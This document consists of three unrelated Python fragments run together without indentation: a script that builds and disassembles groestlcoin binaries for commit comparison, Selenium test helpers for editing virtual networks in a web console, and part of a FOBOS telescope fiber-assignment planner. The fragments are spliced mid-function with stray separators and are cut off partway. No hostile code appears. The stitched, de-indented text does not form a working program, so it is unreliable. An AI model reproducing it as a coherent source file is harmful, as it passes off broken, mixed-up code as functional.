# -freorder-functions moves functions to .unlikely .hot sections
OPTFLAGS+=['-fno-reorder-functions']
# no interprocedural optimizations
# -fno-ipa-profile -fno-ipa-pure-const -fno-ipa-reference -fno-guess-branch-probability -fno-ipa-cp
CPPFLAGS=[]
# Prevent __LINE__ from messing with things
#CPPFLAGS+=["-D__LINE__=0","-D__DATE__=\"\""] #-D__COUNTER__=0"
# XXX unfortunately this approach does not work thanks to boost.
# objcopy: strip all symbols, debug info, and the hash header section
OBJCOPY_ARGS=['-R.note.gnu.build-id','-g','-S']
OBJDUMP_ARGS=['-C','--no-show-raw-insn','-d','-r']
# Set QT_RCC_SOURCE_DATE_OVERRIDE so that groestlcoin-qt is deterministic
os.environ['QT_RCC_SOURCE_DATE_OVERRIDE'] = '1'
# These can be overridden from the environment
GIT=os.getenv('GIT', 'git')
MAKE=os.getenv('MAKE', 'make')
RSYNC=os.getenv('RSYNC', 'rsync')
OBJCOPY=os.getenv('OBJCOPY', 'objcopy')
OBJDUMP=os.getenv('OBJDUMP', 'objdump')
OBJEXT=os.getenv('OBJEXT', '.o') # object file extension
PYDIR=os.path.dirname(os.path.abspath(__file__))
PATCHDIR=os.path.join(PYDIR,'patches')
def init_logging():
LOG_PREFMT = {
(logging.DEBUG, '\x1b[38;5;239m[%(name)-8s]\x1b[0m %(message)s\x1b[0m'),
(logging.INFO, '\x1b[38;5;19m>\x1b[38;5;18m>\x1b[38;5;17m> \x1b[38;5;239m[%(name)-8s]\x1b[0m %(message)s\x1b[0m'),
(logging.WARNING, '\x1b[38;5;228m>\x1b[38;5;227m>\x1b[38;5;226m> \x1b[38;5;239m[%(name)-8s]\x1b[38;5;226m %(message)s\x1b[0m'),
(logging.ERROR, '\x1b[38;5;208m>\x1b[38;5;202m>\x1b[38;5;196m> \x1b[38;5;239m[%(name)-8s]\x1b[38;5;196m %(message)s\x1b[0m'),
(logging.CRITICAL, '\x1b[48;5;196;38;5;16m>>> [%(name)-8s] %(message)s\x1b[0m'),
}
class MyStreamHandler(logging.StreamHandler):
def __init__(self, stream, formatters):
logging.StreamHandler.__init__(self, stream)
self.formatters = formatters
def format(self, record):
return self.formatters[record.levelno].format(record)
formatters = {}
for (level, fmtstr) in LOG_PREFMT:
formatters[level] = logging.Formatter(fmtstr)
handler = MyStreamHandler(sys.stdout, formatters)
logging.basicConfig(level=logging.DEBUG, handlers=[handler])
def safe_path(path: str) -> bool:
'''
Ensure dir is a path we can nuke without consequences.
This is currently restricted to /tmp/<anything>.
'''
abspath = os.path.abspath(path)
if abspath[0] != '/': return False # ???
comps = abspath[1:].split('/') # skip leading slash to avoid relying on empty first component
return len(comps) > 1 and abspath.startswith(TMPDIR)
def shell_split(s: str) -> List[str]:
return shlex.split(s)
def shell_join(s) -> str:
return ' '.join(shlex.quote(x) for x in s)
def check_call(args) -> int:
'''Wrapper for subprocess.check_call that logs what command failed'''
try:
subprocess.check_call(args)
except Exception:
logger.error('Command failed: {}'.format(shell_join(args)))
raise
def cmd_exists(cmd) -> bool:
'''Determine if a given command is available. Requires "which".'''
try:
with open(os.devnull, 'w') as FNULL:
subprocess.check_call(['which', cmd], stdout=FNULL)
except:
return False
return True
def iterate_objs(srcdir) -> str:
'''Iterate over all object files in srcdir'''
for (root, dirs, files) in os.walk(srcdir):
if not root.startswith(srcdir):
raise ValueError
root = root[len(srcdir)+1:]
for filename in files:
if filename.endswith(OBJEXT):
yield os.path.join(root, filename)
def copy_o_files(srcdir: str, tgtdir: str):
'''Copy all object files from srcdir to dstdir, keeping the same directory hierarchy'''
for objname in iterate_objs(srcdir):
outname = os.path.join(tgtdir, objname)
os.makedirs(os.path.dirname(outname), exist_ok=True)
shutil.copy(os.path.join(srcdir, objname), outname)
def objdump_all(srcdir: str, tgtdir: str):
'''
Object analysis pass using objdump.
'''
for objname in iterate_objs(srcdir):
objname = os.path.join(srcdir, objname)
p = subprocess.Popen([OBJDUMP] + OBJDUMP_ARGS + [objname], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(out,err) = p.communicate()
if p.returncode != 0:
raise Exception('objdump failed')
(out,err) = (out.decode(),err.decode())
# postprocess- break into sections separated by 'Disassembly of section...'
sections = defaultdict(list)
funcname = ''
for line in out.splitlines():
match = re.match('^Disassembly of section (.*):$', line)
if match:
funcname = match.group(1)
if not '.rodata' in line: # filter out 'ebc: R_X86_64_32 .rodata+0x1944'
sections[funcname].append(line)
'''
lines = []
for section in sorted(sections.keys()): # '' header section automatically comes first
#lines.extend(sections[section])
lines.append(sections[section][0])
out = '\n'.join(lines)
outname = os.path.join(tgtdir, objname[:-len(OBJEXT)] + '.dis')
make_parent_dirs(outname)
with open(outname, 'w') as f:
f.write(out)
'''
for section in sections.keys():
if not section:
continue
name = hashlib.sha1(section.encode()).hexdigest()
outname = os.path.join(tgtdir, name + '.dis')
os.makedirs(os.path.dirname(outname), exist_ok=True)
with open(outname, 'w') as f:
f.write('\n'.join(sections[section]))
# some TODO s, learning about the objdump output:
# - demangle section names
# - remove/make relative addresses
# - sort/combine sections
# - remove duplicate sections? (sounds like linker's work - can we do a partial link that preserves sections, such as for inlines?)
# - resolve callq's relocations - these are ugly right now - integrate reloc result into instruction by substituting argument
# - [- 17: R_X86_64_32S vtable for boost::exception_detail::bad_exception_+0x30-]
# (at the very least delete callq's arguments)
# - for data (mov etc): fill in data? pointers change arbitrarily especially in combined string tables (.rodata.str1...)
# and these entries don't have names/symbols
# - or could use a different disassembler completely, such as capstone. Parsing objdump output is a hack.
def parse_arguments():
parser = argparse.ArgumentParser(description='Build to compare binaries. Execute this from a repository directory.')
parser.add_argument('commitids', metavar='COMMITID', nargs='+')
parser.add_argument('--executables', default='src/groestlcoind', help='Comma-separated list of executables to build, default is "src/groestlcoind"')
parser.add_argument('--tgtdir', default=DEFAULT_TGTDIR, help='Target directory, default is "{}"'.format(DEFAULT_TGTDIR))
parser.add_argument('--repodir', default=DEFAULT_REPODIR, help='Temp repository directory, default is "{}"'.format(DEFAULT_REPODIR))
parser.add_argument('--parallelism', '-j', default=DEFAULT_PARALLELISM, type=int, help='Make parallelism, default is {}'.format(DEFAULT_PARALLELISM))
parser.add_argument('--assertions', default=DEFAULT_ASSERTIONS, type=int, help='Build with assertions, default is {}'.format(DEFAULT_ASSERTIONS))
parser.add_argument('--opt', default=None, type=str, help='Override C/C++ optimization flags. Prepend + to avoid collisions with arguments, e.g. "+-O2 -g"')
parser.add_argument('--patches', '-P', default=None, type=str, help='Comma separated list of stripbuildinfo patches to apply, one per hash (in order).')
parser.add_argument('--prefix', default=None, type=str, help='A depends prefix that will be passed to configure')
parser.add_argument('--nocopy', default=DEFAULT_NOCOPY, type=int, help='Build directly in the repository. If unset, will rsync or copy the repository to a temporary directory first, default is {}'.format(DEFAULT_NOCOPY))
args = parser.parse_args()
args.patches = dict(zip(args.commitids, [v.strip() for v in args.patches.split(',')])) if args.patches is not None else {}
args.executables = args.executables.split(',')
if args.opt is not None:
if not args.opt.startswith('+'):
print('"opt" argument must start with +', file=sys.stderr)
exit(1)
args.opt = shell_split(args.opt[1:])
else:
args.opt = OPTFLAGS
# Safety checks
if not args.nocopy and not safe_path(args.repodir):
logger.error('Temp repository directory {} may not be used. Please use {}, e.g. "{}/{}"'.format(args.repodir, TMPDIR, TMPDIR, args.repodir))
exit(1)
return args
def main():
args = parse_arguments()
init_logging()
try:
try:
os.makedirs(args.tgtdir)
except FileExistsError:
logger.warning("{} already exists, remove it if you don't want to continue a current comparison session".format(args.tgtdir))
if safe_path(args.tgtdir):
dodelete = input("Delete {}? [y/n] ".format(args.tgtdir))
if dodelete == 'y' or dodelete == 'Y':
# Remove target dir
logger.info('Removing {}'.format(args.tgtdir))
check_call(['rm', '-rf', args.tgtdir])
for commit in args.commitids:
try:
int(commit,16)
except ValueError:
logger.error('{} is not a hexadecimal commit id. It\'s the only thing we know.'.format(commit))
exit(1)
# Copy repo, unless nocopy is set
if not args.nocopy and safe_path(args.repodir):
if cmd_exists(RSYNC.split(' ')[0]):
logger.info('RSyncing repository ...')
check_call([RSYNC,
'-r', # recursive
'--delete', # delete extraneous files on dst
'.git', # from .git in CWD
args.repodir]) # to repodir
else:
gitdir = os.path.join(args.repodir, '.git')
logger.warning('Command "rsync" not found; resorting to cp, which tends to be slower.')
logger.info('Copying repository ...')
# Touch (to avoid file not found) and remove repodir/.git so we don't end up with repodir/.git/.git
check_call(['mkdir','-p',args.repodir])
check_call(['touch',gitdir])
check_call(['rm','-rf',gitdir])
check_call(['cp','-r','.git',args.repodir])
# Go to repo
os.chdir(args.repodir)
# Determine (g)make arguments
make_args = []
if args.parallelism is not None:
make_args += ['-j{}'.format(args.parallelism)]
# Disable assertions if requested
cppflags = CPPFLAGS
if not args.assertions:
cppflags+=['-DNDEBUG']
for commit in args.commitids:
logger.info("Building {}...".format(commit))
stripbuildinfopatch = args.patches[commit] if commit in args.patches else DEFAULT_PATCH
commitdir = os.path.join(args.tgtdir, commit)
commitdir_obj = os.path.join(args.tgtdir, commit+'.o')
try:
os.makedirs(commitdir)
except FileExistsError:
logger.error("{} already exists; skipping".format(commitdir))
continue
check_call([GIT,'reset','--hard'])
check_call([GIT,'clean','-f','-x','-d'])
check_call([GIT,'checkout',commit])
try:
if commit in args.patches:
logger.info('User-defined patch: {}'.format(stripbuildinfopatch))
check_call([GIT,'apply', os.path.join(PATCHDIR,stripbuildinfopatch)])
except subprocess.CalledProcessError:
logger.error('Could not apply patch to strip build info. Probably it needs to be updated')
exit(1)
check_call(['./autogen.sh'])
logger.info('Running configure script')
opt = shell_join(args.opt)
check_call(['./configure', '--disable-hardening', '--without-cli', '--disable-tests', '--disable-bench', '--disable-ccache',
'--prefix={}'.format(args.prefix) if args.prefix else '--with-incompatible-bdb',
'CPPFLAGS='+(' '.join(cppflags)),
'CFLAGS='+opt, 'CXXFLAGS='+opt, 'LDFLAGS='+opt] + CONFIGURE_EXTRA)
for name in args.executables:
logger.info('Building executable {}'.format(name))
target_name = os.path.join(args.tgtdir, os.path.basename(name) + '.' + commit)
check_call([MAKE] + make_args + [name])
shutil.copy(name, target_name)
check_call([OBJCOPY] + OBJCOPY_ARGS + [name, target_name + '.stripped'])
logger.info('Copying object files...')
copy_o_files('.', commitdir_obj)
logger.info('Performing basic analysis pass...')
objdump_all(commitdir_obj, commitdir)
if len(args.commitids)>1:
logger.info('Use these commands to compare | |
changes the elements of a list from unicode to string '''
for t in range(len(my_list)):
if isinstance(my_list[t]['value'], list):
for m in range(len(my_list[t]['value'])):
my_list[t]['value'][m] = str(
my_list[t]['value'][m])
elif isinstance(my_list[t]['value'], unicode):
my_list[t]['value'] = str(
my_list[t]['value'])
else:
my_list[t]['value'] = str(
my_list[t]['value'])
# end type_change
def get_slick_cell_text(self, br=None, index=1):
try:
obj_text = self.find_element(
('slick-cell',
index),
'class',
browser=br,
elements=True).text
except WebDriverException:
time.sleep(15)
self.screenshot('not able to get slick cell')
obj_text = self.find_element(
('slick-cell',
index),
'class',
browser=br,
elements=True).text
return obj_text
# end get_slick_cell_text
def click_on_cancel_if_failure(self, element_id):
try:
element_id = 'cancelBtn'
obj = self.find_element(element_id, screenshot=False)
obj.click()
except:
pass
# end click_on_cancel_if_failure
def get_item_list(self, ui_list):
item_list = self.find_element('item-list', 'class', elements=True)
for index in range(len(item_list)):
intf_dict = {}
label = self.find_element(
'label',
'tag',
browser=item_list[index],
elements=True)
for lbl in label:
key = self.find_element('key', 'class', browser=lbl)
value = self.find_element('value', 'class', browser=lbl)
ui_list.append(value.text)
return ui_list
# end get_item_list
def expand_advance_details(self, count=20):
flag = 0
while flag < count:
plus_objs = []
try:
plus_objs = self.find_element("i[class*='icon-plus expander']",'css', elements=True,screenshot=False)
flag += 1
self.click(plus_objs)
time.sleep(3)
except (WebDriverException, TimeoutException):
break
# end expand_advance_details
def get_api_detail(self, uuid, option):
self.vn_api_url = option + uuid
return self._get_list_api(self.vn_api_url)
# end get_api_detail
def get_vn_detail_ops(self, domain, project_vn, vn_name):
self.vn_ops_url = 'virtual-network/' + domain + project_vn + ":" + \
vn_name + "?flat"
return self._get_list_ops(self.vn_ops_url)
# end get_vn_detail_ops
def click_icon_cog(self, index, browser, option, type):
self.click_element('icon-cog', 'class', index)
self.wait_till_ajax_done(index)
tool_tip_option = "//a[contains(@class,'tooltip-success')]"
tool_tip = self.find_element(tool_tip_option, 'xpath', index, elements=True)
if option == 'edit':
tool_tip[0].click()
else:
if type == 'Networks':
tool_tip[1].click()
self.click_element('configure-networkbtn1', browser=browser)
elif type =='Ports':
tool_tip[2].click()
self.click_element('configure-Portsbtn1', browser=browser)
self.wait_till_ajax_done(index)
# end click_icon_cog
def get_vn_detail_ui(self, search_key, index=0, vn_name=None):
option = 'Networks'
if not self.click_configure_networks():
self.dis_name = None
self.wait_till_ajax_done(self.browser)
if not index:
rows = self.get_rows(canvas=True)
if vn_name:
for row in rows:
out = re.search(vn_name, str(row.text))
index += 1
if out:
break
else:
index = len(rows)
toggle_icon = "//i[contains(@class,'toggleDetailIcon')]"
edit = self.find_element(toggle_icon, 'xpath', elements=True)
edit[index-1].click()
self.wait_till_ajax_done(self.browser)
item = self.find_element("//ul[contains(@class,'item-list')]", 'xpath')
out_split = re.split("\n",item.text)
join_res = "-".join(out_split)
if search_key == 'Display Name':
regexp = "Display Name\-(.*)\-UUID"
flag = True
elif search_key == 'UUID':
regexp = "UUID\-(.*)\-Admin"
flag = True
elif search_key == 'Policy':
regexp = "Policies\-(.*)\-Forwarding Mode"
flag = True
elif search_key == 'Subnet':
regexp = "Subnet(.*)Name"
flag = True
elif search_key == 'Host Route':
regexp = "Host Route\(s\)(.*)DNS"
flag = True
elif search_key == 'Adv Option':
regexp = "Shared.*Floating"
flag = False
elif search_key == 'DNS':
regexp = "DNS Server\(s\)(.*)Ecmp"
flag = False
elif search_key == 'FIP':
regexp = "Floating IP Pool\(s\)(.*)Route"
flag = False
elif search_key == 'RT':
regexp = "Route Target\(s\)(.*)Export"
flag = False
elif search_key == 'ERT':
regexp = "Export Route Target\(s\)(.*)Import"
flag = False
elif search_key == 'IRT':
regexp = "Import Route Target\(s\)(.*)"
flag = False
out = re.search(regexp,join_res)
if flag:
result = out.group(1)
else:
result = out.group(0)
return result
# get_vn_detail_ui
def edit_remove_option(self, option, category, vn_name=None):
self.option = option
index = 0
try:
if self.option == "Networks":
self.logger.info("Go to Configure->Networking->Networks page")
if not self.click_configure_networks():
result = result and False
elif self.option == "Ports":
if not self.click_configure_ports():
result = result and False
rows = self.get_rows(canvas=True)
if rows:
self.logger.info("%d rows are there under %s " % (len(rows),self.option))
self.logger.info("%s are available to edit. Editing the %s" % (option,option))
if vn_name:
for row in rows:
out = re.search(vn_name, str(row.text))
index += 1
if out:
break
else:
index = len(rows)
if len(rows):
self.wait_till_ajax_done(self.browser)
self.click_icon_cog(rows[index-1], self.browser, category, option)
else:
self.logger.error("No %s are available to edit" % (option))
self.screenshot(option)
self.wait_till_ajax_done(self.browser)
result = index
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# edit_remove_option
def edit_vn_without_change(self):
result = True
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit')
if self.edit_vn_result:
try:
self.logger.info("Click on save button")
self.click_element('configure-networkbtn1')
except WebDriverException:
self.logger.error("Error while trying to save %s" %(option))
result = result and False
self.screenshot(option)
self.click_on_cancel_if_failure('cancelBtn')
raise
else:
self.logger.error("Clicking the Edit Button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# edit_vn_without_change
def edit_vn_disp_name_change(self, vn_name):
result = True
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit')
if self.edit_vn_result:
self.click_element('display_name')
self.send_keys(vn_name, 'span12', 'class', clear=True)
self.click_element('configure-networkbtn1')
else:
self.logger.error("Clicking the Edit Button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# edit_vn_disp_name_change
def add_vn_with_policy(self,pol_name):
result = True
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit')
if self.edit_vn_result:
self.click_element('s2id_network_policy_refs_dropdown')
select_highlight = "//li[contains(@class,'select2-highlighted')]"
select = self.find_element(select_highlight, 'xpath')
pol_name = select.text
select.click()
self.click_element('configure-networkbtn1')
return pol_name
else:
self.logger.error("Clicking the Edit Button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# add_vn_with_policy
def del_vn_with_policy(self,pol_name):
result = True
option = "Networks"
try:
policy_ui = str(self.get_vn_detail_ui('Policy'))
policy = pol_name.split(":")
out = re.search(policy[-1],policy_ui)
if out:
index = 1
self.edit_vn_result = self.edit_remove_option(option, 'edit')
if self.edit_vn_result:
del_row = self.find_element('s2id_network_policy_refs_dropdown')
count = 0
if index > 0:
close_option = "//a[contains(@class,'select2-search-choice-close')]"
for element in self.find_element(close_option, 'xpath', elements=True):
count = count + 1
if count == index:
element.click()
self.logger.info("Policy got removed successfully")
self.click_element('configure-networkbtn1')
self.wait_till_ajax_done(self.browser)
else:
self.logger.warn("There is no policy to edit")
else:
self.logger.error("Clicking the edit button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# del_vn_with_policy
def edit_vn_with_subnet(self, category, subnet, dfrange, dfgate, vn):
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit', vn_name=vn)
if self.edit_vn_result:
self.wait_till_ajax_done(self.browser)
self.click_element('ui-accordion-subnets-header-0')
self.wait_till_ajax_done(self.browser)
self.click_element('icon-plus', 'class')
data_row = "//tr[contains(@class,'data-row')]"
data = self.find_element(data_row, 'xpath', elements=True)
data_new = []
for item in data:
if item == '':
pass
else:
data_new.append(item)
data_len = len(data_new)
ipam = self.find_element('s2id_user_created_ipam_fqn_dropdown', elements=True)
if data_len> 3 :
index = data_len-3
elif data_len>1 or data_len <=3:
index = data_len-1
else:
index = 0
cidr_option = "//input[contains(@name,'user_created_cidr')]"
self.send_keys(subnet, cidr_option, 'xpath', clear=True, if_elements=[index])
allocation_pool = "//textarea[contains(@name,'allocation_pools')]"
self.send_keys(dfrange, allocation_pool, 'xpath', clear=True, if_elements=[index])
if category == 'Subnet':
default_gateway = "//input[contains(@name,'default_gateway')]"
self.send_keys(dfgate, default_gateway, 'xpath', \
clear=True, if_elements=[index])
elif category == 'Subnet-gate':
gateway_option = "//input[contains(@name,'user_created_enable_gateway')]"
self.click_element(gateway_option, 'xpath', elements=True, index=index)
elif category == 'Subnet-dns':
dns_option = "//input[contains(@name,'user_created_enable_dns')]"
self.click_element(dns_option, 'xpath', elements=True, index=index)
elif category == 'Subnet-dhcp':
dhcp_option = "//input[contains(@name,'enable_dhcp')]"
self.click_element(dhcp_option, 'xpath', elements=True, index=index)
self.click_element('configure-networkbtn1')
self.wait_till_ajax_done(self.browser)
result = self.edit_vn_result
else:
self.logger.error("Clicking the Edit Button is not working")
result = False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# edit_vn_with_subnet
def del_vn_with_subnet(self, vn):
result = True
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit', vn_name=vn)
if self.edit_vn_result:
self.click_element('ui-accordion-subnets-header-0')
self.wait_till_ajax_done(self.browser)
data_row = "//tr[contains(@class,'data-row')]"
data = self.find_element(data_row, 'xpath', elements=True)
ind = 0
act_cell = self.find_element('action-cell', 'class')
minus_icon = "//i[contains(@class,'icon-minus')]"
self.click_element(minus_icon, 'xpath', elements=True, index=ind)
self.click_element('configure-networkbtn1')
self.wait_till_ajax_done(self.browser)
else:
self.logger.error("Clicking the Edit Button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# del_vn_with_subnet
def edit_vn_with_host_route(self, button, tc, hprefix, hnexthop):
result = True
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit')
if self.edit_vn_result:
self.click_element('host_routes')
self.wait_till_ajax_done(self.browser)
if button == 'add':
edit_grid = "//a[contains(@class,'editable-grid-add-link')]"
add_link = self.find_element(edit_grid, 'xpath', elements=True)
add_link[1].click()
prefix = "//input[contains(@name,'prefix')]"
self.send_keys(hprefix, prefix, 'xpath')
next_hop = "//input[contains(@name,'next_hop')]"
self.send_keys(hnexthop, next_hop, 'xpath')
else:
minus_icon = "//i[contains(@class,'icon-minus')]"
minus = self.find_element(minus_icon, 'xpath', elements=True)
index = len(minus)
minus[index-1].click()
self.click_element('configure-networkbtn1')
self.wait_till_ajax_done(self.browser)
if tc == 'neg':
warn_button_host_route = "//span[contains(@data-bind,'hostRoutes')]"
warn_button = self.find_element(warn_button_host_route, 'xpath')
if warn_button.get_attribute('style') == "":
self.click_on_cancel_if_failure('cancelBtn')
self.wait_till_ajax_done(self.browser)
return result
else:
result = result and False
else:
self.logger.error("Clicking the Edit Button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# edit_vn_with_host_route
def edit_vn_with_adv_option(self, category, tc, var_list):
option = "Networks"
try:
self.wait_till_ajax_done(self.browser)
if not self.click_configure_networks():
result = False
if category == 1:
add_icon = "//i[contains(@class,'icon-plus')]"
self.click_element(add_icon, 'xpath')
disp_name = "//input[contains(@name,'display_name')]"
self.send_keys(var_list[3], disp_name, 'xpath')
self.click_element('ui-accordion-subnets-header-0')
self.click_element("icon-plus", 'class')
cidr = "//input[contains(@name,'user_created_cidr')]"
| |
<reponame>Keck-FOBOS/producer
"""
Construct a set of observations by assigning fibers to targetsAllocate apertures to targets.
Contains code originally written by 2021 Akamai intern, <NAME>.
.. include:: ../include/links.rst
"""
import io
import sys
import time
import warnings
from pathlib import Path
from configparser import ConfigParser
from IPython import embed
import numpy
from astropy import table
from .deploy import FOBOSApertures
from .allocate import assign_apertures
from .targets import parse_targets
# TODO:
# - Set fraction to assign to sky
# - Write method that assigns sky fibers, guide bundles, calibration
# bundles
def configure_observations(objx, objy, aptype, mode=None, max_nobs=None):
"""
Construct a series of observations to observe a set of targets with
a fixed field center.
Args:
objx (`numpy.ndarray`_):
Cartesian x coordinate in tangent plane projection of object
coordinates relative to the pointing center. Shape must be
1D and match ``objy``.
objy (`numpy.ndarray`_):
Cartesian y coordinate in tangent plane projection of object
coordinates relative to the pointing center. Shape must be
1D and match ``objx``.
aptype (:obj:`int`, `numpy.ndarray`_):
The aperture type for each object. Can provide a single
integer for all targets or an aperture type for each object.
The aperture type must be 0 for a single-fiber aperture or 1
for a 37-fiber IFU.
mode (:obj:`int`, array-like, optional):
The mode assignment for each spectrograph. Can be 0 to turn
off all apertures for a given spectrograph, but otherwise
must be 1 for the single-fiber apertures, 2 for multi-IFU
mode, or 3 for monolithic IFU mode. If a single integer,
all spectrographs are put in the same mode; otherwise must
provide the mode for each of the 3 spectrographs separately.
max_nobs (:obj:`int`, optional):
Impose a maximum number of observations to configure. If None,
observations will be configured until no more objects are within the
field of view.
Returns:
stuff
"""
# Check input
if objx.ndim > 1:
raise ValueError('Input coordinate arrays must be 1D.')
if objy.shape != objx.shape:
raise ValueError('Input coordinate arrays must have the same shape.')
nobj = objx.size
_aptype = numpy.atleast_1d(aptype)
if _aptype.size == 1:
_aptype = numpy.full(nobj, aptype, dtype=int)
if _aptype.shape != objx.shape:
raise ValueError('For per-object aperture types, must have same shape as coordinates.')
if not numpy.all(numpy.isin(_aptype, [0,1])):
raise ValueError('Aperture types must be 0 (single-fiber) or 2 (IFU).')
# If mode is None, first try to set it based on the aperture types
if mode is None:
if numpy.all(_aptype == 0):
# All aperture are in single-fiber mode, so set the
# instrument configuration accordingly
mode = 1
elif numpy.all(_aptype == 1):
# All aperture are in IFU mode, so set the instrument
# configuration accordingly
mode = 2
# If mode is still None, that means there is a mix of IFU and
# single-fiber targets, and we need to find the best of 6 possible
# mixed-mode configurations
if mode is None:
raise NotImplementedError('Cannot yet determine best mixed mode configuration.')
# Setup the apertures
ap = FOBOSApertures(mode=mode)
# Objects to track assigned object and aperture IDs for each
# observation
obs_obj = []
obs_ap = []
obs_nap = []
obs_mode = []
_objx = objx.copy()
_objy = objy.copy()
_aptype = aptype.copy()
obj_id = numpy.arange(nobj, dtype=int)
# Get the aperture ID, coordinates, and payload type
ap_id = ap.id.copy()
apx, apy = ap.coo.T.copy()
payload = ap.payload.copy()
# TODO: This can be moved inside the loop
# Read the starbug coordinates
ap_indx = ap.select('science')
# Total number of objects within the field-of-view
n_in_fov = numpy.sum(objx**2 + objy**2 < (ap.fov*60/2)**2)
# Itertatively construct observations that each, as much as
# possible, assign apertures to targets until no more targets can be
# observed.
niter = 0
while _objx.size > 0 and (max_nobs is None or niter < max_nobs):
# TODO: This ordering means single fibers are given priority
# over IFUs
_a_obj = None
_a_ap = None
# Only consider those objects in the field of view
in_fov = _objx**2 + _objy**2 < (ap.fov*60/2)**2
# Assign the single-fiber apertures to appropriate targets
use_obj = (_aptype == 0) & in_fov
use_ap = (payload == 0) & ap_indx
_nap = numpy.sum(use_ap)
if numpy.any(use_obj) and numpy.any(use_ap):
_a_obj, _a_ap = assign_apertures(_objx, _objy, apx, apy,
ignore_obj=numpy.where(numpy.logical_not(use_obj))[0],
ignore_ap=numpy.where(numpy.logical_not(use_ap))[0])
if _a_obj.size == 0:
_a_obj = None
_a_ap = None
# Assign the IFU apertures to appropriate targets
use_obj = (_aptype == 1) & in_fov
use_ap = (payload == 1) & ap_indx
_nap += numpy.sum(use_ap)
if numpy.any(use_obj) and numpy.any(use_ap):
_ifu_obj, _ifu_ap \
= assign_apertures(_objx, _objy, apx, apy,
ignore_obj=numpy.where(numpy.logical_not(use_obj))[0],
ignore_ap=numpy.where(numpy.logical_not(use_ap))[0],
allocated_obj=_a_obj, allocated_ap=_a_ap)
if _ifu_obj.size > 0:
_a_obj = numpy.append(_a_obj, _ifu_obj)
_a_ap = numpy.append(_a_ap, _ifu_ap)
if _a_obj is None or _a_obj.size == 0:
# No apertures could be assigned so we're done!
break
# Add the object IDs, aperture IDs, and spectrograph mode for
# this observation
obs_obj += [obj_id[_a_obj]]
obs_nap += [_nap]
obs_ap += [ap_id[_a_ap]]
obs_mode += [ap.mode]
# Remove the assigned objects from those available in the next
# iteration
_objx = numpy.delete(_objx, _a_obj)
_objy = numpy.delete(_objy, _a_obj)
_aptype = numpy.delete(_aptype, _a_obj)
obj_id = numpy.delete(obj_id, _a_obj)
niter += 1
return n_in_fov, obs_obj, obs_nap, obs_ap, obs_mode
def report_configurations(n_in_fov, obs_obj, obs_nap, obs_ap, obs_mode):
"""
Construct a report of the observation configurations.
"""
tab = table.Table()
# Number of observations
nobs = len(obs_obj)
# Pointing number
tab['Pointing'] = numpy.arange(nobs)+1
# Number of available apertures in each observation
tab['Avail'] = numpy.array(obs_nap)
# Number of allocations in each observation
tab['Alloc'] = numpy.array([len(o) for o in obs_obj])
# Fractional growth of observed targets
tab['Compl'] = numpy.cumsum(tab['Alloc'])/n_in_fov
tab['Compl'].format = '.4f'
# Fraction of all apertures assigned
tab['Eff'] = tab['Alloc']/tab['Avail']
tab['Eff'].format = '.4f'
# Mean fraction of assigned apertures for this and all previous observations
tab['MeanEff'] = numpy.cumsum(tab['Eff'])/(numpy.arange(nobs)+1)
tab['MeanEff'].format = '.4f'
print(f'Total number of targets available: {n_in_fov}')
print(f'Total number of pointings: {nobs}')
print('')
tab.write(sys.stdout, format='ascii.fixed_width_two_line', delimiter=' ')
def write_configurations(root, ra, dec, center, obs_obj, obs_ap, obs_mode, objid=None, path=None,
ndig=None, tight=False, target_file=None, ra_c=None, dec_c=None):
"""
Write a set of configuration files for each FOBOS observation.
Args:
root (:obj:`str`):
The root name for all output files.
ra (`numpy.ndarray`_):
Right ascension coordinates for all considered objects.
dec (`numpy.ndarray`_):
Declination coordinates for all considered objects. Shape must
match ``ra``.
center (:obj:`tuple`):
RA and DEC coordinates for the FOBOS pointing center.
obs_obj (:obj:`list`):
List of `numpy.ndarray`_ objects identifying the indices of the
objects observed from the provided list of coordinates. The number
of items in the list sets the number of revisits to the same
pointing. This is the same as the second object returned by
:func:`~producer.plan.configure_observations`.
obs_ap (:obj:`list`):
List of `numpy.ndarray`_ objects identifying the indices of the
FOBOS apertures used for each object observed. List length must
match ``obs_obj``. This is the same as the fourth object returned
by :func:`~producer.plan.configure_observations`. The aperture
indices must match indices when instantiating a
:class:`~producer.deploy.FOBOSApertures` object in the specified
mode (``obs_mode``).
obs_mode (:obj:`list`):
List of `numpy.ndarray`_ objects identifying the FOBOS mode; see
:class:`~producer.deploy.FOBOSApertures`. List length must match
``obs_obj``. This is the same as the last object returned by
:func:`~producer.plan.configure_observations`.
objid (`numpy.ndarray`_, optional):
An array with identifiers for each object. Each array element must
convert directly to a string. Uniqueness is not checked. Shape
must match ``ra``. If None, just set to the 0-indexed array index.
path (:obj:`str`, optional):
Root path for all output files. If None, either set to the parent
path provided by ``root`` or set to the current directory.
ndig (:obj:`int`, optional):
